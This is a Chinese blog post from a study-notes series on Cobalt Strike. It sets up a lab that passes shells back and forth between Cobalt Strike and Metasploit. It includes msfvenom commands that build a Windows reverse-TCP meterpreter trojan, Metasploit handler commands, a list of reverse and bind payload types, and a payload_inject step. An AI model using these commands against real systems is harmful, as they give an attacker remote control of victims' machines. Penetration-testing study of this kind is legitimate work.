您的位置:首页 > 编程语言 > ASP

CobaltStrike系列学习笔记——(三)与metasploit互相派生shell

2020-01-14 23:43 1401 查看

CobaltStrike系列学习笔记——(三)与metasploit互相派生shell

实验环境 系统 IP地址
CobaltStrike(服务器/客户端) kali 192.168.134.130
靶机 win7 192.168.134.135
MSF kali 192.168.134.138
Cobalt strike派生shell给MSF

前提条件:已经获得一个CobaltStrike shell。(关于Cobalt strike shell如何获得这里不再赘述,可参考第一节的内容)
首先在metasploit处创建一个handler:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.134.138
set lport 7777
exploit


在Listeners下点击Add新建一个New Listener,按照下图填写,点击Save保存设置。

payload选择windows/foreign/reverse_tcp
host设置为msf的host
port设置为创建msf的handler时的port


选中session,右键->Spawn。

选择msf这个listenner,点击Choose。

再来看看msf这边,已经收到了派生过来的shell。

尝试执行命令试试:

MSF派生shell给Cobalt strike

使用下列命令生成一个Windows下反弹shell木马:

msfvenom -p  windows/meterpreter/reverse_tcp lhost=192.168.134.138 lport=4444  -f exe -o  shell.exe

这里介绍一下Meterpreter中常用的反弹类型:
1.reverse_tcp
这是一个基于TCP的反向链接反弹shell, 使用起来很稳定。
(1)Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f elf -o 要生成的文件名
(2)Windows:
msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f exe -o 要生成的文件名
2.reverse_http
基于http方式的反向连接,在网速慢的情况下不稳定。
3.reverse_https
基于https方式的反向连接,在网速慢的情况下不稳定, https如果反弹没有收到数据,可以将监听端口换成443试试。
4.bind_tcp
这是一个基于TCP的正向连接shell,因为在内网跨网段时无法连接到attack的机器,所以在内网中经常会使用,不需要设置LHOST。
引自:https://www.cnblogs.com/backlion/p/9484949.html

如图我们可以看见目录下已经成功生成木马文件shell.exe:

使用模块handler,设置payload(注意:这里设置的payload要和我们生成木马所使用的payload一样),地址和端口,我们就开始监听了:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.134.138
set lport 4444
exploit


把shell.exe拷贝到靶机上,使用cmd命令行运行木马:

回到MSF上,可以发现成功反弹回shell了,执行命令成功:

在cobaltstrike上创建一个新的Listeners,用于接收msf派生的shell:在Listeners下点击Add新建一个New Listener,按照下图填写,点击Save保存设置。

回到msf,将当前session切换到后台,然后使用下图的模块,功能是注入一个新的payload 到当前的session里面,同样需要设置payload(注意:这里设置的payload要和我们cs上创建的listener对应),地址和端口,并且还要选择选择session:

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lhost 192.168.134.130
set lport 6666
set session 1
exploit


再看看cobalt strike,此时在cobalt strike上已经拿到了metasploit派生的shell:

  • 点赞
  • 收藏
  • 分享
  • 文章举报
limb0 发布了15 篇原创文章 · 获赞 2 · 访问量 1076 私信 关注
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: